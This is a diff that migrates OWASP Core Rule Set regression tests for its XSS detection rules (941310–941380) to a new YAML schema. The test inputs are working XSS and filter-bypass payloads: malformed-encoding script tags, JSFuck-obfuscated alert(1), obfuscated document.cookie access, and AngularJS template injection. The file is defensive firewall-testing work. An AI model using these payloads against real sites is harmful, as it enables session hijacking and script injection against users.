uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 9 desc: Negative for missing end tag, closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 10 desc: Negative using real world Russian example in utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 11 desc: Negative using real world Russian example in utf-8, variant stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 12 desc: "Status Page Test - US-ASCII Malformed Encoding XSS Filter Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index ee155e7f6..65c280f54 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941320.yaml +rule_id: 941320 tests: - - test_title: 941320-1 + - test_id: 1 desc: "XSS Attack - HTML Tag Handler" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\">" - output: - log_contains: id "941330" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: "payload=" + output: + log: + expect_ids: [941330] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index 214a6fed4..b75576c73 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -1,41 +1,39 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941340.yaml +rule_id: 941340 tests: - - test_title: 941340-1 + - test_id: 1 desc: "IE XSS Filters - Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' infoo.bar=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941340" - - test_title: 941340-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' infoo.bar=&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941340] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=XSS" - version: HTTP/1.0 - output: - log_contains: id "941340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=XSS" + version: HTTP/1.0 + output: + log: + expect_ids: [941340] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 11cd1675f..97a14eb20 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -1,23 +1,21 @@ --- meta: author: "fgsch, azurit" - enabled: true - name: 941350.yaml - description: Test rule 941350 +rule_id: 941350 tests: - - test_title: 941350-1 + - test_id: 1 desc: GH issue 1514 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/xx?id=%252bADw-script%252bAD4-" - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941350" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/xx?id=%252bADw-script%252bAD4-" + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log: + expect_ids: [941350] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index 218cf00ad..b94241cfa 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml @@ -1,61 +1,59 @@ --- meta: author: "Christian Folini, azurit" - description: None - enabled: true - name: 941360.yaml +rule_id: 941360 tests: - - test_title: 941360-1 + - test_id: 1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" - # Payload represents "alert(1)" in JSFuck encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 941360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] + - test_id: 2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=(![]+[])[+!+[]]" - # Payload represents "a" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 941360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] + - test_id: 3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=+!![]" - # Payload represents "1" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index 405779515..ca9246a0a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml @@ -1,177 +1,175 @@ --- meta: author: "Andrea Menin, azurit" - description: None - enabled: true - name: 941370.yaml +rule_id: 941370 tests: - - test_title: 941370-1 + - test_id: 1 desc: "Bypass using comment in syntax and multiple whitespaces" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 2 desc: "Bypass using comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 3 desc: "Bypass using JavaScript global variables" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 5 desc: "Bypass using JavaScript global variables and string concatenation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%22%5Cx24%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%5Cx24%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index de766fa9f..5b4a9f5f3 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -1,24 +1,22 @@ --- meta: author: "Franziska Buehler, azurit" - description: None - enabled: true - name: 941380.yaml +rule_id: 941380 tests: - - test_title: 941380-1 + - test_id: 1 desc: "AngularJS client side template injection detection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff" - # /login?user={{constructor.constructor('alert(1)')()}} - version: HTTP/1.1 - output: - log_contains: id "941380" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff" + # /login?user={{constructor.constructor('alert(1)')()}} + version: HTTP/1.1 + output: + log: + expect_ids: [941380] diff --git 